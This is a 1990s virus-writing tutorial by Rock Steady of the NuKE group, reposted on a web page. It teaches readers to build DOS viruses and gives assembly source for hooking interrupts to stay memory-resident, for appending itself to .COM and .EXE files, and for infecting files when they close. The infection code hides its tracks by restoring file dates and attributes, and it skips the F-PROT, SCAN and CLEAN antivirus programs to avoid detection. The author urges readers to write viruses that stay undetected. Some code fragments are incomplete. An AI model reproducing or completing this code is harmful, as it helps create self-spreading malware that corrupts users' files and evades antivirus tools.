> >

Frequently Asked Questions About Computer Viruses - Part 4

Rock Steady/NuKE
** TSR COM infections **
** **
** By Rock Steady/NuKE **

There are several ways to constructed your viruses. Mainly you have those
which are RAM-Resident or better known as a TSR program. And with great
thought we have those which are not RAM-Resident.

A TSR virus will load into memory and can infect all programs that are
executed by the computer. Such like my AmiLiA virus which will infect all
EXE and COM files that are ran. Anyhow a TSR virus can certainly spread a lot
faster compared to a Non-Resident Virus. Because a NON-Resident Virus will
only infect file each time it is ran. Though the NON-Resident will start
off very slowly infecting the system files but after the virus is in the
system after a number of weeks, it will certainly infect ALL files that are
in the system. Where a TSR virus will USUALLY infect files that are executed.
So that only files that are often executed will be infected. But The TSR
virus can certainly infect A LOT more files than a Non-Resident JUST on the
first Hour! It is out numbered 10 to 1. This is the advantage that all
programmers enjoy and program TSR viruses. I will explain a SIMPLE method of
making your program a TSR one. And it will be as flexible as you want so
that NO ONE can stay you `Stole' this information off Rock Steady.

Anyhow I will explain the simple Process of Intercepting ROM-Bios
Interrupts and hooking your virus/Program to any Interrupt of your choice.
This method that is being explained is also used ALL the Jerusalem Strains.
And several of the Vacsina Strains. They total up to close to 100+ Viruses
that use this simple way with the TSR Interrupt 27h. Anyhow just because I'm
explaining this method your virus CANNOT be detected because of this TSR
routines because there are routines I DEVELOPED ALONE and will soon to be
release in one of my future virii. Anyhow there are an UNLIMITED amount of
ways to make TSRs so that along as you Develop YOUR OWN routine it will NEVER
get detected as a virus for all you Beginners. And how this routine can be
used in several OTHER utilities not just viruses.

First we must Intercept an Interrupt, Lets say we want our virus to
activate Every TIME the disk I/O is being used we would use INT 13h or
INT 21h. The INT 13h will activate everytime ANY file is opened or Closed
And the INT 21h will activity anytime any file is executed or any INT 21h
functions Like a "DIR" in DOS. If you want you can even hooked your virus
to INT 10h and it may activate when Graphics are displayed, or you can hook
it to the interrupt involved with Printer Functions. Whatever seems to
`EnLighten' you, since we live in a Distressed world, I won't even bother
why we shouldn't hooked them up to just ANY interrupt.

Anyhow, interrupts use a vector table at the bottom of memory (ROM) to
find out what routine in the ROM Bios to call. So the address for Interrupt
21h would be located at 0000:0084 and for Interrupt 13h it would be found at
0000:004Ch. So we can change theses addresses in the vector table. What we
do is we change the vector address to POINT to our virus. So everytime the
Interrupt is called it goes to the vector table and the table tells it to
call our Virus, rather than calling the ROM Bios. But what MUST do
FIRST is save the ORIGINAL Interrupt routine and place that somewhere in
memory. So that our virus will call the Original ROM Bios routine after
executing itself.

Lets say we hooked our Virus to the INT 13h, which controls all Disk
Activities. So if our Computer users tries to read something from the disk
the Computer will call the INT 13h bios Routines on How To do it. But
instead of finding the INT 13h routines it calls our virus, and the Virus
gets ran, which then our virus does what it has to do, and then runs the
Original INT 13h Routine where-ever it was stored. So it simulates an INT
call to the ROM bios routines.

; Sample Program on how to Hook your virus to an Interrupt call.
Code Segment
Assume cs:code,ss:code,ds:code,es:code
Org 100h ; Guess this will be a COM file? Huh?

Begin: JMP Bios_Routine

NOP ; This is just a cheap .COM file that the
NOP ; virus is attached to. Remember you should
NOP ; have the first 3 bytes written in your
INT 20h ; virus.

OLD_ROM_INT DD ? ;Our Stack to save the OLD Int Address

; This Calls the VIRUS and then the simulates the OLD Rom Routine
Virus_Codes PROC FAR
Assume cs:code, ds:nothing

pushf ; Everytime the ROM-Routine is call this
push ax ; is what happens... Saves the Regesters
push di ; And runs Our Virus... Then it restores
push si ; the regesters and Runs the OLD_ROM Bios
push es ; Routine that was supposed to be ran in
push ds ; the first place...
call The_Virus
pop ds ;NoTe: It's better to SAVE all Regesters and
pop es ; Flags because our Virus WILL ALTER a few
pop si ; And when the Virus leaves control back to the
pop di ; Computer it is EXPECTED to continue where it
pop ax ; It left off...

pushf ; This `pushf' is NEEDED to act like a simulated
call OLD_ROM_INT ; ROM Bios Interrupt call...

Virus_Codes ENDP

; Put the REAL Virus Codes here...
... ; Put your OWN Virus codes here...
... ; Just make it compatible with our
... ; Codes... Try to make it small and
... ; it will take up less space in the
... ; users' memory.
... ;NoTe: Try to infect files that are ONLY
... ; Executed! Rather than each time the INT
... ; is used... Get it?
The_Virus ENDP

; This is the Procedure that SAVE the OLD_ROM Bios in our Virus
; And places a Call to point to our Virus. Which then Calls the
; OLD_ROM Bios Routine. So Remember to SAVE it first.
Bios_Routine PROC NEAR
Assume cs:code,ds:code

mov ah,35h ; This Asks for the interrupt vector!
mov al,13h ; whatever is in AL is what int vector
int 21h ; address you get and is stored in ES:BX

mov word ptr OLD_ROM_INT,bx ;Save the BX register in our Stack
mov word ptr OLD_ROM_INT[2],es ;And same to the ES Register

; Here you SHOULD put a small routine to check if the Interrupt vector has
; already been changed! For INT 13h this should contain 0000:004Ch the
; formula for this is (Interrupt # times 4) For INT 21h it is (21hx4)=84h
; and so on. So if its been changed it means the virus has already changed
; it! And it `Should' be resident. How ever this is a simple way of doing
; it. but not always the BEST way... Because any program the hooks to the
; virus interrupt will fool the virus to think it is already resident.
; Though this source is NOT for the Professional Virus Programmer like myself
; because WE KNOW! But for those that are half way there...

mov ah,25h ; This asks to set a Interrupt vector address!
mov al,13h ; Interrupt # to be set goes in AL
mov dx,offset Virus_Codes ; Sets INT 13h to point to `Virus Code'
int 21h

mov dx,offset Bios_Routine
int 27h
Bios_Routine ENDP

; Anything after this point will not be memory resident. because the end
; of the resident portion ends at `Bios_Routine' procedure.

END Begin
;----------------------------- EnD ----------------------------------

Simple isn't it? Anyhow I tried to make this as simple as possible. I
hope I didn't lose you. Anyhow this is a simple routine that several
TSR virii use. Anyhow, see what that gives you....

Rock Steady
NukE / Viral Development Researcher
** Constructing Kit on infecting .COM **
** **
** By Rock Steady/NuKE **

Well I must state my opinion that there are certainly WAY too many
Overwriting Viruses out here. To help put a Stop to this I will try
to explain to you a SIMPLE way to infect COM files at the END of the
Program. This routine WORKS if you follow my steps correctly, and
I've already used this in my `ParaSite ][' Virus.

Anyhow this is a brief description what the ASM Source will do.
1. Find a .COM file in the current Directory
2. Save the Date and File's Attribute.
3. Save the First 3 Bytes in a Stack
4. Infect the File & restore new 3 bytes..
5. Put the OLD date and File Attributes back on

; The Simple routine to Search for a .COM File...
com_files db "*.com",0

mov ah,4eh ;point to a *.COM file...
mov dx,com_files
mov cx,3 ;Attributes with ReadOnly or Hidden
int 21h ;is A okay...

cmp ax,12h ;Any files found?
je exit ;If no Files found Exit...
jmp found_file
; Instead of Exiting here you can make the Virus go and change dir and
; look for several other .com files else where... with the help of the
; path or simply searching for more <dir>...

mov di,[si+file] ;di points to the filename
push si
add si,file ;si points to filename...

mov ax,offset 4300h ;get file Attributes...
mov dx,si ;filename in dx..
int 21h

mov file_attrib,cx ;Save file Attributes.

file dw 0
; Here we'll set the file attributes to nothing

mov ax,offset 4301h ;To set file Attributes...
mov cx,offset 0fffeh ;Set them to a Normal File
mov dx,si ;filename...
int 21h

mov ax,offset 3d02h ;Open File to Read/Write.
mov dx,si ;ASCIIZ filename
int 21h

jnb ok ;If file was open continue
jmp put_old_attrib ; error happened restore old attribs
; and quit.
mov bx,ax
mov ax,offset 5700h ;Get File Date & Time...
int 21h

mov old_time,cx ;Save old File Time...
mov old_date,dx ;Save old File Date

old_time db 0
old_date db 0

; here we infect the file... but first we SAVE the first 3 bytes
; somewhere in our virus

mov ah,3fh ;Read file...
mov cx,3 ;Number of bytes to read
mov dx,first_3 ;Save bytes in the buffer
add dx,si ;Filename...
int 21h

cmp ax,3 ;Where 3 bytes read?
jnz fix_file ;If not fix file like before and quit

first_3 equ $ ; The First three bytes of the Original File!
int 20h ; the virus is infected to.

; This moves the File pointer to the END of the file

mov ax,offset 4202h
mov cx,0
mov dx,0
int 21h
mov cx,ax ;DX:AX is the FILESIZE!
sub ax,3 ;subtract three because of file pointer

add cx,offset c_len_y
mov di,si
sub di,offset c_len_x
mov [di],cx ;Modifies the 2nd & 3rd bytes of program

; The writes our virus to the file

mov ah,40h
mov cx,virlength ;Virus Length
mov dx,si ;File...
sub dx,offset codelength ;Length of virus codes.
int 21h

cmp ax,offset virlength ;all bytes written?
jnz fix_file ;If no fix file and quit

;Moves the file pointer to the beginning of file and write the
;3 bytes JMP at the beginning of the file

mov ax,offset 4200h
mov cx,0
mov dx,0
int 21h

mov ah,40h ;Write to file...
mov cx,3 ;# of bytes to write...
mov dx,si ;File name...
add dx,jump ;Point to the new JMP statement
int 21h

jump db 0e9h ;This is the JMP that will be put in the
;Begining of the file!

;Restore Old File Time & Date

mov dx,old_date ;Old File Date
mov cx,old_time ;Old file Time...
and cx,offset 0ffe0h ;Flat Attribs.
mov ax,offset 5701h
int 21h

mov ah,3eh
int 21h ;Close file...

; Here we'll restore the old file attributes...

mov ax,offset 4301h
mov cx,old_att ;old File Attributes.
mov dx,si ;Filename...
int 21h

;----------------------------- EnD -------------------------------------

Anyhow that's it... Simple no? This source was also used in my ParaSite ][
Virus that is STILL undetectable to date with Scanv85. Anyhow I even made
it MORE simpler than my real sources that have to play with the file paths.

Anyhow theres still work to be done, like you must restore the old data file
so it will jump to 100h and run the old file the virus was infected too!
Remember to store them in the beginning and then restore them! Anyhow there's
a few Variables to be put in like `VirLength' which you should know how to
do that also the `CodeLength' that is the VIRUS codes ONLY not counting the

Anyhow This works FINE with a Non-Resident Virus. Because a few statements
would have to be edited for TSRs. Anyhow try to use this, it's small neat
and fast.

Anyhow Perhaps next issue I will develop a SIMPLE Ram-Resident virus that
infects COMs and EXEs to be released into the next issue! Though I just
release this sources for you to LEARN! Rather than putting you name on my
virus and releasing another strain on work I worked Hard upon! Anyhow I
should release a SIMPLE new Virus source for all you programmers out there!
And I will even explain a few Stealth Technics like how to hide your program
in memory right under the TOM.

If there's Any Questions you want to know, please ask them I will answer
them in the next [NukE] Releases... I may even release source codes on how
to make an Algorithm Encryption method! I've developed one on my own,
without the V2PX viruses sources... Anyhow it does the job and the formula
I developed has an UNLIMITED amount of encryption methods! But since the
virus codes have to be SMALL Like close to 2,000 bytes I will limit the
formula to about 1,000 different combinations!

Rock Steady
NukE / Viral Development Reaseacher
** Infection on Closing **
** **
** By Rock Steady/NuKE **

This routine goes out for a few people that had trouble hacking this
routine themselves... I kinda like it, its my very OWN, no Dark Avenger
hack, it is VERY straight forward, and kinda simple...I was not going
to put this here, but since I `Promised' people and left them hanging
with `Wait for IJ#5, I guess I owed you it... huh?'

Again this code comes right out of Npox 2.0, its need, simple fast,
cool, and it works, Npox is your example, I heard MANY MANY complaints
with other `Virus writing guides' Meaning they explained the code but
sometimes the arthur himself never check if the code was good, as he
may have modified it, and not test it... or whatever reason... Anyhow

Okay once you intercepted the Int21h/ah=3Dh function you make it jump

closing_file: cmp bx,0h ;Handle=0?
je closing_bye ;if equal leave
cmp bx,4h ;Handle > 4
ja close_cont ;if YES ,then JUMP!
closing_bye: jmp dword ptr cs:[int21] ;Leave, no interest to us

The whole point of the above code is that DOS contains 5 predefined
Handlers, 0 -> 4, Basically, those handles are the NULL, CON, AUX
COMx, LPTx handles... So we surely do not need to continue once we
encounter that...

close_cont: push ax
push bx
push cx
push dx
push di
push ds
push es
push bp

Our biggest problem is how do we know if this file is a .COM or .EXE or
simply just another dumb data file? We need this info before we can
try to infect it... We do this by getting DOS's "Lists of List" this
will give us all INFO need on the File Handle Number we have in BX!
and we do that like so...

push bx ;Save File Handle
mov ax,1220h ;Get the Job File Table
int 2fh ;(JFT)

This will give us the JFT for the CURRENT File handle in BX, which
is given thru ES:DI Then we use this information to get the Address of
the System File Table!

mov ax,1216h ;Get System File Table (List)
mov bl,es:[di] ;system file table entry number
int 2fh
pop bx ;restore the Handle

add di,0011h
mov byte ptr es:[di-0fh],02h

add di,0017h ;Jump to the ASCIIZ string
cmp word ptr es:[di],'OC' ;Is it a .COM file?
jne closing_next_try ;Next cmp...
cmp byte ptr es:[di+2h],'M'
jne pre_exit ;Nope exit
jmp closing_cunt3 ;.COM file continue

cmp word ptr es:[di],'XE' ;Is it a .EXE file?
jne pre_exit ;No, exit
cmp byte ptr es:[di+2h],'E'
jne pre_exit ;No, exit

If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when
started up, Opens itself, closes itself, etc... So that a dumb
virus will infect it, and then the CRC value changes and F-PROT
screams... haha... Fuck-Prot! is the name...

closing_cunt: cmp word ptr es:[di-8],'CS'
jnz closing_cunt1 ;SCAN
cmp word ptr es:[di-6],'NA'
jz pre_exit

closing_cunt1: cmp word ptr es:[di-8],'-F'
jnz closing_cunt2 ;F-PROT
cmp word ptr es:[di-6],'RP'
jz pre_exit

closing_cunt2: cmp word ptr es:[di-8],'LC'
jnz closing_cunt3
cmp word ptr es:[di-6],'AE' ;CLEAN
jnz closing_cunt3

pre_exit: jmp closing_nogood

The REST is pretty much the EXACT same on `how' you'd infect a normal
file, I'll leave it for you to go thru it... The hardest part is
OVER! Only trick part is, the ending... Remember to Close the file
and then do an IRET, you don't leave control to dos, as you only needed
to close it, so do it... OR DON'T close it and return to DOS, as dos
will close it, just DON'T CLOSE IT TWICE!!!!

closing_cunt3: mov ax,5700h ;Get file Time
call calldos21
mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jz closing_nogood ;Already infected

push cs
pop ds
mov word ptr ds:[old_time],cx ;Save time
mov word ptr ds:[old_date],dx

mov ax,4200h ;jmp beginning of
xor cx,cx ;file...
xor dx,dx
call calldos21

mov ah,3fh ;Get first 1b byte
mov cx,1Bh
mov dx,offset buffer
call calldos21

jc closing_no_good ;error?
mov ax,4202h ;Jmp to the EOF
xor cx,cx
xor dx,dx
call calldos21

jc closing_no_good
cmp word ptr ds:[buffer],5A4Dh ;.EXE file?
je closing_exe ;Yupe then jmp
mov cx,ax
sub cx,3h
mov word ptr ds:[jump_address+1],cx ;Figure out the
call infect_me ;jmp for .com

jc closing_no_good
mov ah,40h ;Write it to file
mov dx,offset jump_address
mov cx,3h
call calldos21
mov cx,word ptr ds:[old_time] ;Save file time
mov dx,word ptr ds:[old_date] ;& date
mov ax,5701h
call calldos21

closing_nogood: pop bp
pop es
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]

AS you see the above, we DIDN'T close the file, so we leave dos to do it.
The bottom is for infecting .exes...

closing_exe: mov cx,word ptr cs:[buffer+20] ;Save the original
mov word ptr cs:[exe_ip],cx ;CS:IP & SS:SP
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx

push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc closing_no_good

add ax,virus_size
adc dx,0

push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax

push bx
push cx
mov cl,7
shl dx,cl

mov bx,ax
mov cl,9
shr bx,cl

add dx,bx
and ax,1FFh
jz close_split
inc dx
close_split: pop cx
pop bx

mov word ptr cs:[buffer+2],ax
mov word ptr cs:[buffer+4],dx

mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21

closing_over: jmp closing_no_good

; Infection Routine...
infect_me proc
mov ah,40h
mov dx,offset init_virus
mov cx,virus_size
call calldos21

jc exit_error ;Error Split
mov ax,4200h
xor cx,cx ;Pointer back to
xor dx,dx ;Top of file!
call calldos21

jc exit_error ;Split Dude...
clc ;Clear carry flag
stc ;Set carry flag
infect_me endp

Rate this item
(0 votes)

Leave a comment

Please do not enter any marketing or illegal statements | කරුණාකර අලෙවිකරණ හෝ නීති විරෝධී ප්‍රකාශන ඇතුළත් නොකරන්න.

Subscribe to Weekly Email Newsletter

Joomla Extensions powered by Joobi

Articles Archive

Articles Calendar

« January 2021 »
Mon Tue Wed Thu Fri Sat Sun
        1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
This Week
Last Week
This Month
Last Month
All days
Your IP:
2021-01-16 10:58

Video Of The Day

Go to top